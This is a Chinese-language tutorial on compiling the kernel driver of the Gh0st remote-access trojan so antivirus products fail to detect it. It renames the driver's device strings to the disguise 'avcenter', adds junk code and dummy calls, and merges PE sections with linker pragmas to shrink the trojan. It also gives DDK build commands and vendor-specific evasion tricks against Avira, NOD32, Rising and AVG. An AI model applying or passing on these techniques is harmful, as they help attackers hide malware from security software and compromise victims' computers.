Gh0st编译免杀系列教程2_驱动文件编译方法1

命令行编译驱动

 

1.改RESSDT字符串（一共5个地方）

先搜索RESSDT，改为什么都行，比如我改为avcenter

//        RtlInitUnicodeString(&DerName,L"//Device//RESSDT");
        RtlInitUnicodeString(&DerName,L"//Device//avcenter");

//        RtlInitUnicodeString(&DerName2,L"//??//RESSDTDOS");
        RtlInitUnicodeString(&DerName2,L"//??//avcenterDOS");

//        hDriver = CreateFileA( "////.//RESSDTDOS",
        hDriver = CreateFileA( "////.//avcenterDOS",

//TARGETNAME=RESSDT        //这个得搜索所有文件才可以搜索到了，这个是生成驱动的名称
TARGETNAME=avcenter

//SOURCE=../sys/RESSDT.sys(这里不能用注释符号 ../../bin/RESSDT.sys表示生成到Bin目录里去)
SOURCE=../../bin/avcenter.sys

还得改下上个教程里sys资源调用：
//IDR_SYS                 BIN     DISCARDABLE     "..//sys//RESSDT.sys"
IDR_SYS                 BIN     DISCARDABLE     "..//..//bin//avcenter.sys"

 

2.然后再给驱动文件加点花指令，或者也可以再把那个DbgPrint前的注释去掉

或者加个sprintf也可以：

#include <stdio.h> //先加个文件头
sprintf("aaaaaaa", "bbbbbbbbb", 123);

反正改的越多杀软就越难查杀

3.还可以合并下区段：合并区段是个很重要的方法，特别是在下个教程里你可以看到它的效果

#pragma   comment(linker, "/merge:.rdata=.data ")       //把.rdata区段合并到.data里去
#pragma   comment(linker, "/merge:.text=.data ")        //把.text区段合并到.data里去

合并后驱动文件的大小就由3K变成了2K了，这个还可以使你的木马变小

4.

在命令行编译驱动也有两个方法，第二个方法快点...

—————————————————————————————————————————————————

改完后把Server里的sys文件夹复制到DDK安装目录里，然后在cmd里运行命令

cd/                                                    (来到C盘根目录)
C:/WINDDK/2600/bin/setenv.bat C:/WINDDK/2600 chk       (这个命令得看你的DDK安装在哪)
cd sys                                                 (进入sys目录)
build                                                  (编译sys文件)

—————————————————————————————————————————————————

或者直接来到这里，进入sys文件夹去编译

开始/Development Kits/Windows DDK 2600/Build Environments/Win XP Free Build Environment

—————————————————————————————————————————————————

改下输入表的大小看看过瑞星不？

编译生成之后再去看看sys文件里的字符串哪些变了

这样改后还是有很多杀软会杀的，再给驱动文件加个输入表就可以免杀很多，但我现在还不会，呵呵

5.手动免杀其他杀软

小红伞：移动ntoskrnl.exe到驱动文件的最后

nod32：改子系统

瑞星：改输出表大小为30

avg：填充掉文件头上的那些东西

改后就剩下两个杀软杀了